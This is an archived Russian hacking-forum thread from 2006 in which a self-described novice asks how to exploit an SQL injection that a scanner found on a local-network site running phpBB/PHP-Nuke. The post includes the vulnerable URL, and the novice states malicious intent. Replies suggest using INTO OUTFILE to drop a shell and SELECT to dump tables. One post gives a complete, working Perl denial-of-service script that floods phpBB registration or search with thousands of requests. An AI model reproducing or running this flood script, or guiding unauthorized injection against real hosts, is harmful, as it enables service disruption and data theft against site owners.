Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

SQL - инъекция

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [В Сети] >> SQL - инъекция
Имя
Сообщение << Старые топики   Новые топики >>
SQL - инъекция - 2006-04-06 21:56:19   
dx386

Сообщений: 34
Оценки: 0
Присоединился: 2005-12-26 22:11:09
Доброго времени суток всем!

Господа! Прошу помощи у тех, кто в этом деле что-то смыслит, т.к. я сам "новичок" [sm=10.gif][sm=9.gif]
В общем, дело обстоит так:

1. У нас есть локалка, в ней есть сайт, ip которого я просканел прогой XSpider 7 (в X узнал о ней).
2. Обнаружил следующий вывод XSpider-a:
Серьезная уязвимость
SQL инъекция

Запрос для выполнения SQL инъекции:

http://192.168.0.1/modules.php?name=Forums&file=search&search_id=1''&sid=edaa4e32db5977e46cd1ea57fcf04868

Результат работы

<…>
obtain search results<br /><br /><b><u>DEBUG MODE</u></b><br /><br />SQL Error : 1064 You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''\''
AND session_id = ''fb<br /><br />SELECT search_array
FROM nuke_bbsearch_results

<…>

3. ВОПРОС в том, как воспользоваться этой уязвимостью в своих коварных целях (хе-хе, зловеще), в ИНЕТЕ ( и в любимом гугле) нарыл кучу инфы, НО это совсем не то пальто, там всё идёт в обобщающей форме, а мне хотелось бы узнать, что можно сделать КОНКРЕТНО в моём случае. Я понимаю, что сейчас мне будут советовать RTFM, но я только больше запутаюсь в этой лавине инфы :/ Пожалуйста помогите, кто шарит в этом деле. Объясните мне последовательно, что нужно делать и куда смеятца :) а то я спать не могу с этой мыслью, так похачить охото [sm=1.gif]
Post #: 1
SQL - инъекция - 2006-04-08 14:15:46   
XMblPb

Сообщений: 245
Оценки: 0
Присоединился: 2005-01-11 19:39:40
rtfm! мускульный учебник в руки, функции типа интуаутфайл помогут поднять шелл, а с помощью селекта можно вытянуть инфу из таблиц
Post #: 2
SQL - инъекция - 2006-04-08 21:13:45   
dx386

Сообщений: 34
Оценки: 0
Присоединился: 2005-12-26 22:11:09
Мама :-0 А так сказать на "пальцах" нельзя объяснить?! :/
Post #: 3
SQL - инъекция - 2006-04-09 02:02:55   
rgo

Сообщений: 7170
Оценки: 281
Присоединился: 2004-09-25 05:14:25
На пальцах говоришь…
\|___|? /_|__ [дальше не позволяют особенности движка форума :(]
Post #: 4
SQL - инъекция - 2006-04-09 19:37:42   
Сhaos_Сode

Сообщений: 1049
Оценки: 0
Присоединился: 2006-01-12 11:54:12
Как на пальцах не знаю. Но вот линки в помощь
http://injection.rulezz.ru/
rst.void.ru
web-hack.ru
на xakep.ru может тоже есть - не знаю.
статьи на этих сайтах на примитивном уровне, так что должен разобраться [sm=2.gif]
З.Ы. И учи MySQL и PHP - без этого ни как
Post #: 5
SQL - инъекция - 2006-04-11 18:37:11   
Werm_Rolent

Сообщений: 280
Оценки: 0
Присоединился: 2004-08-02 22:39:27
#!/usr/bin/perl
#######################################
## Recoded by: mix2mix and Elioni of http://ahg-khf.org
## And h4cky0u Security Forums (http://h4cky0u.org)
## Name: phpBBDoSReloaded
## Original Author: HaCkZaTaN of Neo Security Team
## Tested on phpBB 2.0.19 and earlier versions
## Ported to perl by g30rg3_x
## Date: 25/01/06
#######################################
use IO::Socket;

## Initialized X
$x = 0;

print q(
phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN
Recoded by Albanian Hackers Group &
h4cky0u Security Forums

);
print q(Host |without-> http://www.| );
$host = <STDIN>;
chop ($host);

print q(Path |example-> /phpBB2/ or /| );
$pth = <STDIN>;
chop ($pth);

print q(Flood Type |1 = If Visual соnfiгmation is disabled, 2 = If Visual соnfiгmation is enabled| );
$type = <STDIN>;
chop ($type);

## Tipi pлr regjistrim
if($type == 1){

## User Loop for 9999 loops (enough for Flood xDDDD)
while($x != 9999)
{

## Antari qл regjistrohet automatikishtл "X"
$uname = "username=AHG__" . "$x";

## Emaili qл regjistrohet ne bazлn "X"
$umail = "&email=AHG__" . "$x";

$postit = "$uname"."$umail"."%40ahg-crew.org&new_password=0123456&password_соnfiгm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&1осаtiоn=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";

$lrg = length $postit;

my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nNuk mundem te lidhemi me hostin sepse лsht dosirat ose nuk egziston: $!\n" unless $sock;

## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums
print $sock "POST $pth"."profile.php HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: imаgе/gif, imаgе/x-xbitmap, imаgе/jpeg, imаgе/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);

## Print a "+" for every loop
syswrite STDOUT, "+";

$x++;
}

## Tipi 2-shл pлr Kлrkim(Flood)
}
elsif ($type == 2){

while($x != 9999)
{
## Final Search String to Send
$postit = "search_keywords=Albanian+Hackers+Group+Proof+of+Co ncept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";

## Posit Length
$lrg = length $postit;

## Connect Socket with Variables Provided By User
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;

## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums
print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,imаgе/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);

## Print a "+" for every loop
syswrite STDOUT, "+";

## Increment X in One for every Loop
$x++;
}
}else{
## STF??? Qfarл keni Shtypur
die "Mundлsia nuk Lejohet +_-???\n";
}
Post #: 6
SQL - инъекция - 2006-04-13 22:08:24   
dx386

Сообщений: 34
Оценки: 0
Присоединился: 2005-12-26 22:11:09
Мндаааа…букф многа :-D Но если я задам встречный вопрос, то я, наверное, буду выглядеть как полный лам, но, наверное, все через это когда-то проходят. Я ещё только учусь и это меня, наверное, оправдывает в кой-то мере :) И так, что с эти кодом делать??? Если не затруднит, ответьте, пожалуйста. Спасибо за внимание.
Post #: 7
Страниц:  [1]
Все форумы >> [В Сети] >> SQL - инъекция







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.